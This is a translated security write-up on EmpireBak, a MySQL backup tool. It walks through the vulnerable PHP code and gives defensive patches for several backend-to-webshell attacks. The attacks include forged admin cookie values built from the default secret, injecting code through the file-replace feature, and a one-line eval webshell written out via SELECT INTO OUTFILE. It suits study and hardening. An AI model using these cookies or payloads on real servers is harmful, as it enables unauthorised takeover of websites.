EmpireBak (帝国备份王) \class\functions.php, \class\combakfun.php GETSHELL vul

Time: 2022-09-22 16:38:45

catalog

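1. Vulnerability description
2. Vulnerability trigger conditions
3. Affected scope
4. Vulnerable code analysis
5. Defense methods
6. Attack and defense thoughts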

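1. Vulnerability description

EmpireBak is a completely free tool designed for backing up and importing large MySQL databases. It backs up and imports in volumes, so in theory it can back up a database of any size. EmpireBak (帝国备份王) has a number of GETSHELL vulnerabilities; this article goes through, one by one, the ways of getting from the admin backend to GETSHELL.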

Relevant Link:

http://help.aliyun.com/knowledge_detail.htm?knowledgeId=5980885&categoryId=8314968

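2. Vulnerability trigger conditions

0x1: Logging in to the backend with the default weak password

admin

//default weak password from installation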

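0x2: Logging in to the backend with a forged cookie

ebak_loginebakckpass:119770adb578053dcb383f67a81bcbc6
ebak_bakrnd:35y5cCnnA4Kh
ebak_bakusername:admin
ebak_baklogintime:
//with the cookies above, admin.php can be accessed directly

Use the Firefox Tamper Data proxy to intercept requests and visit the following URLs

http://localhost/EmpireBak2010/admin.php
http://localhost/EmpireBak2010/DoSql.php

While Tamper Data has the request paused, modify the cookie value (add the Cookie header if it is not present); the chosen backend page can then be opened without logging in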

Cookie=ebak_loginebakckpass=119770adb578053dcb383f67a81bcbc6;ebak_bakrnd=35y5cCnnA4Kh;ebak_bakusername=admin;ebak_baklogintime=

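0x3: Creating an xx.asp directory under "Manage backup directories" in the backend to GETSHELL through the IIS parsing vulnerability

This has been fixed in newer versions of EmpireBak, and the vulnerability only exists when the target server runs IIS; in practice most deployments are PHP + Apache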

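0x4: Backing up data and replacing directory file contents to GETSHELL

1. After logging in, run a backup once
2. When backing up you can choose the target directory; by default there is one called safemod
3. When the backup finishes, go to "Manage backup directories", then pack and download it
//after the backup, every table under the safemod directory is saved as a PHP file
4. Inspect the contents of the downloaded backup files
5. "Manage backup directories" in EmpireBak has a replace-file-content function; choose the same directory that was just downloaded and click "replace file content": http://www.xxx.com/diguo/RepFiletext.php?mypath=safemod
6. For example, replace content in config.php
/*
<?php
$b_table="ecs_ad_custom";
$tb[ecs_ad_custom]=1;
$b_baktype=0;
$b_filesize=300;
$b_bakline=500;
$b_autoauf=1;
$b_dbname="test";
$b_stru=1;
$b_strufour=0;
$b_dbchar="auto";
$b_beover=0;
$b_insertf="replace";
$b_autofield=",,";
$b_bakdatatype=0;
?>
*/
Replace the string: $b_bakdatatype=0;
with:
$b_bakdatatype=0;
phpinfo();
7. http://xxx/diguo/bdata/safemod/config.php
The phpinfo output is displayed; GETSHELL succeeded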


0x5: Executing custom SQL to export a file and GETSHELL

select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'c:/WEB ROOT PATH/xiaohan.php' 


Relevant Link:

http://www.yunsec.net/a/security/web/jbst/2011/0603/8816.html
http://www.2cto.com/Article/201005/47257.html
http://www.wooyun.org/bugs/wooyun-2010-078591
http://0day5.com/archives/2771
http://www.sqlmap.cc/post-37.html

3. Affected scope

4. Vulnerable code analysis

0x1: Logging in to the backend with a forged cookie

\admin.php

<?php
require('class/connect.php');
require('class/functions.php');
//check whether the user is already logged in
$lur=islogin();
$loginin=$lur['username'];
$rnd=$lur['rnd'];
require LoadAdminTemp('eadmin.php');
?>

\class\functions.php

//check login state
function islogin($uname='',$urnd='')
{
//die(var_dump($_COOKIE));
$_COOKIE['ebak_loginebakckpass'] = "119770adb578053dcb383f67a81bcbc6";
$_COOKIE['ebak_baklogintime'] = "";
/*
From the configuration file /class/config.php; the root cause of the vulnerability is that Empire CMS uses default values
$set_username="admin";
$set_outtime="60";
*/
global $set_username, $set_outtime;
//read bakusername from the $_COOKIE superglobal; the attacker injects: $_COOKIE['ebak_bakusername'] = "admin";
$username = $uname ? $uname : getcvar('bakusername');
//read bakrnd from the $_COOKIE superglobal; the attacker injects: $_COOKIE['ebak_bakrnd'] = "35y5cCnnA4Kh";
$rnd = $urnd ? $urnd : getcvar('bakrnd');
//passes normally
if(empty($username) || empty($rnd))
{
printerror("NotLogin","index.php");
}
//the attacker's goal is to get in as admin without logging in, so these are always equal
if($username <> $set_username)
{
printerror("NotLogin","index.php");
}
/*
validate the values in the cookie
$username = admin
$rnd = 35y5cCnnA4Kh
*/
Ebak_CHCookieRnd($username, $rnd);
$time=time();
if($time-getcvar('baklogintime')>$set_outtime*60)
{
printerror("OutLogintime","index.php");
}
esetcookie("baklogintime",$time,0);
$lr['username']=$username;
$lr['rnd']=$rnd;
return $lr;
}

\class\functions.php

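//verify cookie authentication
function Ebak_CHCookieRnd($username,$rnd)
{
/*
$set_loginrnd is the verification random code from config.php; the root cause of the vulnerability is that it is a default value: $set_loginrnd="YFfd33mV2MrKwDenkecYWZETWgUwMV";
*/
global $set_loginrnd;
//with the default value, the computed result is always: $ckpass = 119770adb578053dcb383f67a81bcbc6
$ckpass = md5(md5($rnd . $set_loginrnd).'-'.$rnd.'-'.$username.'-');
//the comparison passes, the request is treated as logged in, and the vulnerability arises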
if($ckpass<>getcvar('loginebakckpass'))
{
printerror("NotLogin","index.php");
}
}

0x2: Backing up data and replacing directory file contents to GETSHELL

\phome.php

elseif($phome=="RepPathFiletext")//replace directory files
{
Ebak_RepPathFiletext($_POST);
}

\class\combakfun.php

//replace file content
function Ebak_RepPathFiletext($add)
{
global $bakpath;
//path of the directory whose files are replaced
$mypath=trim($add['mypath']);
//content to be replaced
$oldword = Ebak_ClearAddsData($add['oldword']);
//new content used as the replacement
$newword = Ebak_ClearAddsData($add['newword']);
$dozz=(int)$add['dozz'];
if(empty($oldword)||empty($mypath))
{
printerror("EmptyRepPathFiletext","history.go(-1)");
}
if(strstr($mypath,".."))
{
printerror("NotChangeRepPathFiletext","history.go(-1)");
}
$path=$bakpath."/".$mypath;
if(!file_exists($path))
{
printerror("PathNotExists","history.go(-1)");
}
$hand=@opendir($path);
//walk every file in the target directory and run the text replacement on each
while($file=@readdir($hand))
{
$filename=$path."/".$file;
if($file!="."&&$file!=".."&&is_file($filename))
{
$value=ReadFiletext($filename);
if($dozz)
{
//perform the text replacement
$newvalue=Ebak_DoRepFiletextZz($oldword,$newword,$value);
}
else
{
if(!stristr($value,$oldword))
{
continue;
}
$newvalue=str_replace($oldword,$newword,$value);
}
WriteFiletext_n($filename,$newvalue);
}
}
printerror("RepPathFiletextSuccess","RepFiletext.php");
}

\class\functions.php

//regex replacement
function Ebak_DoRepFiletextZz($oldword,$newword,$text)
{
$zztext=Ebak_RepInfoZZ($oldword,"empire-bak-wm.chief-phome",0);
//no filtering at all, replaced directly
$text=preg_replace($zztext,$newword,$text);
return $text;
}

0x3: Executing custom SQL to export a file and GETSHELL

\phome.php

elseif($phome=="DoExecSql")
{
Ebak_DoExecSql($_POST);
}
elseif($phome=="DoTranExecSql")
{
$file=$_FILES['file']['tmp_name'];
$file_name=$_FILES['file']['name'];
$file_type=$_FILES['file']['type'];
$file_size=$_FILES['file']['size'];
Ebak_DoTranExecSql($file,$file_name,$file_type,$file_size,$_POST);
}

\class\combakfun.php

//execute SQL statement
function Ebak_DoExecSql($add)
{
global $empire,$phome_db_dbname,$phome_db_ver,$phome_db_char;
$query = $add['query'];
if(!$query)
{
printerror("EmptyRunSql","history.go(-1)");
}
//database
if($add['mydbname'])
{
$empire->query("use `".$add['mydbname']."`");
}
//character set
if($add['mydbchar'])
{
DoSetDbChar($add['mydbchar']);
}
$query = Ebak_ClearAddsData($query);
//call Ebak_DoRunQuery to execute the final SQL statement
Ebak_DoRunQuery($query, $add['mydbchar'], $phome_db_ver);
printerror("RunSqlSuccess","DoSql.php");
}

//upload and execute SQL
function Ebak_DoTranExecSql($file,$file_name,$file_type,$file_size,$add){
global $empire,$phome_db_dbname,$phome_db_ver,$phome_db_char;
if(!$file_name||!$file_size)
{
printerror("NotChangeSQLFile","history.go(-1)");
}
$filetype=GetFiletype($file_name);//get the file extension
if($filetype!=".sql")
{
printerror("NotTranSQLFile","history.go(-1)");
}
//upload the file
$newfile='tmp/uploadsql'.time().'.sql';
$cp=Ebak_DoTranFile($file,$newfile);
if(empty($cp))
{
printerror("TranSQLFileFail","history.go(-1)");
}
$query=ReadFiletext($newfile);
DelFiletext($newfile);
if(!$query)
{
printerror("EmptyRunSql","history.go(-1)");
}
//database
if($add['mydbname'])
{
$empire->query("use `".$add['mydbname']."`");
}
//character set
if($add['mydbchar'])
{
DoSetDbChar($add['mydbchar']);
}
//call Ebak_DoRunQuery to execute the final SQL statement
Ebak_DoRunQuery($query,$add['mydbchar'],$phome_db_ver);
printerror("RunSqlSuccess","DoSql.php");
}

\class\functions.php

//run SQL
function Ebak_DoRunQuery($sql,$mydbchar,$mydbver)
{
$sql=str_replace("\r","\n",$sql);
$ret=array();
$num=0;
//split the input into individual statements
foreach(explode(";\n",trim($sql)) as $query)
{
$queries=explode("\n",trim($query));
foreach($queries as $query)
{
$ret[$num].=$query[0]=='#'||$query[0].$query[1]=='--'?'':$query;
}
$num++;
}
unset($sql);
foreach($ret as $query)
{
$query=trim($query);
if($query)
{
if(substr($query,0,12)=='CREATE TABLE')
{
mysql_query(Ebak_DoCreateTable($query,$mydbver,$mydbchar)) or die(mysql_error()."<br>".$query);
}
else
{
mysql_query($query) or die(mysql_error()."<br>".$query);
}
}
}
}

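5. Defense methods

0x1: Logging in to the backend with a forged cookie

From a security best-practice standpoint, cookie-based login verification should be backed by the session mechanism

\class\functions.php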

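//set cookie authentication
function Ebak_SCookieRnd($username,$rnd)
{
//session-based login verification
session_start();
global $set_loginrnd;
//add a random factor to the cookie value
$ckpass = md5(md5($rnd.$set_loginrnd).'-'.$rnd.'-'.$username.'-'.mt_rand() );
//record it in the session
$_SESSION['ckpass'] = $ckpass;
esetcookie("loginebakckpass",$ckpass,0);
}

//verify cookie authentication
function Ebak_CHCookieRnd($username,$rnd)
{
//session-based login verification
session_start();
global $set_loginrnd;
//read the value stored in the session (empty when no login has taken place)
$ckpass = isset($_SESSION['ckpass']) ? $_SESSION['ckpass'] : '';
//reject an empty session value, otherwise a missing cookie would compare equal to it
if(empty($ckpass) || $ckpass<>getcvar('loginebakckpass'))
{
printerror("NotLogin","index.php");
}
}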
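
A stricter variant of the session-bound check above, as an added example rather than EmpireBak's or the original author's code: the token comes from random_bytes() instead of md5()/mt_rand(), an empty session never matches, the comparison is constant-time, and the idle timeout is kept on the server. The function names, the EBAK_IDLE_SECONDS constant and the array passed in place of $_SESSION are assumptions made so that the block runs from the CLI.

```php
<?php
// Added example: the names below are hypothetical, not EmpireBak functions.
// $session stands in for $_SESSION so the block runs from the CLI.

const EBAK_IDLE_SECONDS = 3600; // assumed idle timeout (60 minutes)

// Issue a fresh token at login and remember it server-side.
function ebak_issue_token(array &$session, string $username, int $now): string
{
    $token = bin2hex(random_bytes(32)); // CSPRNG, independent of config.php
    $session['ckpass']   = $token;
    $session['username'] = $username;
    $session['seen']     = $now;
    return $token; // value to place in the loginebakckpass cookie
}

// Validate the cookie value against the session on every request.
function ebak_check_token(array &$session, string $username, string $cookie, int $now): bool
{
    $stored = $session['ckpass'] ?? '';
    if ($stored === '' || $cookie === '') {
        return false; // no login happened in this session
    }
    if (!hash_equals($stored, $cookie)) {
        return false; // constant-time comparison
    }
    if (($session['username'] ?? '') !== $username) {
        return false; // token was issued to a different account
    }
    if ($now - ($session['seen'] ?? 0) > EBAK_IDLE_SECONDS) {
        $session = []; // expired: drop the server-side state
        return false;
    }
    $session['seen'] = $now; // sliding expiry tracked on the server
    return true;
}

// Constructed demo values.
$session = [];
$t0 = 1700000000;
// A cookie derived from the shipped default $set_loginrnd is only a string here.
var_dump(ebak_check_token($session, 'admin', '119770adb578053dcb383f67a81bcbc6', $t0));
$cookie = ebak_issue_token($session, 'admin', $t0);
var_dump(ebak_check_token($session, 'admin', $cookie, $t0 + 60));
var_dump(ebak_check_token($session, 'admin', $cookie, $t0 + 7200));
```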

0x2: Backing up data and replacing directory file contents to GETSHELL

\class\combakfun.php

//replace file content
function Ebak_RepPathFiletext($add)
{
global $bakpath;
//path of the directory whose files are replaced
$mypath=trim($add['mypath']);
//content to be replaced
$oldword = Ebak_ClearAddsData($add['oldword']);
//new content used as the replacement
$newword = Ebak_ClearAddsData($add['newword']);
/**/
if( preg_match("/([^a-zA-Z0-9_]{1,1})+(extract|parse_str|str_replace|unserialize|ob_start|require|include|array_map|preg_replace|copy|fputs|fopen|file_put_contents|file_get_contents|fwrite|eval|phpinfo|assert|base64_decode|create_function|call_user_func)+( |\()/is", $newword) )
{
die("Request Error!");
}
/**/
$dozz=(int)$add['dozz'];
if(empty($oldword)||empty($mypath))
{
printerror("EmptyRepPathFiletext","history.go(-1)");
}
if(strstr($mypath,".."))
{
printerror("NotChangeRepPathFiletext","history.go(-1)");
}
$path=$bakpath."/".$mypath;
if(!file_exists($path))
{
printerror("PathNotExists","history.go(-1)");
}
$hand=@opendir($path);
//walk every file in the target directory and run the text replacement on each
while($file=@readdir($hand))
{
$filename=$path."/".$file;
if($file!="."&&$file!=".."&&is_file($filename))
{
$value=ReadFiletext($filename);
if($dozz)
{
//perform the text replacement
$newvalue=Ebak_DoRepFiletextZz($oldword,$newword,$value);
}
else
{
//the search string does not occur, skip this file
if(!stristr($value,$oldword))
{
continue;
}
$newvalue=str_replace($oldword,$newword,$value);
}
/* inject check */
$prePath = dirname(__FILE__) . DIRECTORY_SEPARATOR;
$url = "http://webshellcheck.oss-cn-hangzhou.aliyuncs.com/AliCheck.php";
if (file_exists($prePath . "AliCheck.php"))
{
//check whether is latest
if (ini_get('allow_url_fopen') == '1')
{
$content = @file_get_contents($url);
if (!empty($content))
{
if ( md5($content) != md5_file($prePath . "AliCheck.php") )
{
die("not equal");
file_put_contents($prePath . "AliCheck.php", $content);
}
}
}
include_once $prePath . "AliCheck.php";
$scaner = new Pecker_Scanner();
$scaner->scanFileContent($filename,$newvalue);
$result = $scaner->getReport();
if (!empty($result[$filename]['function']))
{
die("Request Error!");
}
$scaner = null;
}
else
{
//file not exist, need download
if (ini_get('allow_url_fopen') == '1')
{
//check url is valid
$content = @file_get_contents($url);
if (!empty($content))
{
file_put_contents($prePath . "AliCheck.php", $content);
}
}
}
/**/
WriteFiletext_n($filename,$newvalue);
}
}
printerror("RepPathFiletextSuccess","RepFiletext.php");
}
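
The keyword blacklist above looks for specific function names in $newword. An allowlist-style alternative, as an added example that is not part of EmpireBak or of the patch above: accept a replacement only when the PHP token structure of the file is unchanged, so that only literal values may differ. ebak_code_shape() and ebak_replace_is_data_only() are hypothetical names, and the PHP tokenizer extension is assumed to be available.

```php
<?php
// Added example: hypothetical helpers, not EmpireBak functions.

// Reduce PHP source to its code "shape": literals become placeholders,
// whitespace and comments are dropped, everything else is kept verbatim.
function ebak_code_shape(string $source): array
{
    $literal = [T_CONSTANT_ENCAPSED_STRING, T_LNUMBER, T_DNUMBER, T_INLINE_HTML];
    $skip    = [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];
    $shape   = [];
    foreach (token_get_all($source) as $tok) {
        if (!is_array($tok)) {
            $shape[] = $tok;                 // single-character token: = ; ( ) ...
        } elseif (in_array($tok[0], $skip, true)) {
            continue;
        } elseif (in_array($tok[0], $literal, true)) {
            $shape[] = token_name($tok[0]);  // value may change, kind may not
        } else {
            $shape[] = token_name($tok[0]) . ':' . trim($tok[1]);
        }
    }
    return $shape;
}

// True only if the edit changed literal values and nothing else.
function ebak_replace_is_data_only(string $before, string $after): bool
{
    return ebak_code_shape($before) === ebak_code_shape($after);
}

// Constructed sample modelled on the config.php shown earlier on this page.
$before = "<?php\n\$b_dbname=\"test\";\n\$b_bakdatatype=0;\n?>";

// Changing a literal keeps the shape.
$renamed = str_replace('"test"', '"shop"', $before);
var_dump(ebak_replace_is_data_only($before, $renamed));

// Appending a statement changes the shape and is refused.
$extended = str_replace('$b_bakdatatype=0;', "\$b_bakdatatype=0;\nphpinfo();", $before);
var_dump(ebak_replace_is_data_only($before, $extended));
```

To use it inside Ebak_RepPathFiletext(), compare $value with $newvalue and skip WriteFiletext_n() when the function returns false.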

0x3: Executing custom SQL to export a file and GETSHELL

\class\functions.php

//run SQL
function Ebak_DoRunQuery($sql,$mydbchar,$mydbver)
{
$sql=str_replace("\r","\n",$sql);
$ret=array();
$num=0;
//split the input into individual statements
foreach(explode(";\n",trim($sql)) as $query)
{
$queries=explode("\n",trim($query));
foreach($queries as $query)
{
$ret[$num].=$query[0]=='#'||$query[0].$query[1]=='--'?'':$query;
}
$num++;
}
unset($sql);
foreach($ret as $query)
{
$query=trim($query);
if($query)
{
/* SQL injection filter */
if(preg_match("/select.*into.*(outfile|dumpfile)/sim", $query, $matches))
{
echo "request error!" . "</br>" . $matches[0];
die();
}
/* */
if(substr($query,0,12)=='CREATE TABLE')
{
mysql_query(Ebak_DoCreateTable($query,$mydbver,$mydbchar)) or die(mysql_error()."<br>".$query);
}
else
{
mysql_query($query) or die(mysql_error()."<br>".$query);
}
}
}
}
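
The filter above inspects the query text; whether INTO OUTFILE can write anything is decided by MySQL itself, through the FILE privilege and secure_file_priv. The added example below (not EmpireBak code; the function names and the sample grant rows are constructed) goes one step beyond the page and audits SHOW GRANTS output for the account EmpireBak connects with.

```php
<?php
// Added example: hypothetical helpers, not part of EmpireBak.

// Rows from SHOW GRANTS that permit SELECT ... INTO OUTFILE/DUMPFILE.
// FILE is a global privilege, so only grants ON *.* are relevant.
function ebak_grants_allowing_file(array $grantRows): array
{
    $hits = [];
    foreach ($grantRows as $row) {
        // GRANT <privileges> ON <scope> TO <account> ...
        if (!preg_match('/^GRANT\s+(.+?)\s+ON\s+(\S+)\s+TO\s/i', $row, $m)) {
            continue;
        }
        if ($m[2] !== '*.*') {
            continue;
        }
        $privs = array_map('trim', explode(',', strtoupper($m[1])));
        if (array_intersect($privs, ['FILE', 'ALL PRIVILEGES', 'ALL'])) {
            $hits[] = $row;
        }
    }
    return $hits;
}

// Combine the grants with @@secure_file_priv (NULL, '' or a directory).
function ebak_outfile_exposure(array $grantRows, ?string $secureFilePriv): string
{
    if (!ebak_grants_allowing_file($grantRows)) {
        return 'blocked: account has no FILE privilege';
    }
    if ($secureFilePriv === null) {
        return 'blocked: secure_file_priv is NULL';
    }
    if ($secureFilePriv === '') {
        return 'open: FILE granted and secure_file_priv is empty';
    }
    return 'restricted: writes limited to ' . $secureFilePriv;
}

// Constructed sample rows in SHOW GRANTS format.
$backupOnly = ["GRANT SELECT, LOCK TABLES, SHOW VIEW ON `shop`.* TO `ebak`@`localhost`"];
$tooBroad   = ["GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` WITH GRANT OPTION"];

echo ebak_outfile_exposure($backupOnly, ''), "\n";
echo ebak_outfile_exposure($tooBroad, ''), "\n";
echo ebak_outfile_exposure($tooBroad, null), "\n";
```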

0x4: Disabling the backup function

The simplest, bluntest approach is to turn EmpireBak off entirely

/phome.php

..
elseif($phome=="RepPathFiletext")
{
//Ebak_RepPathFiletext($_POST);
die("request error!");
}
..

6. Attack and defense thoughts

Copyright (c) 2015 LittleHann All rights reserved
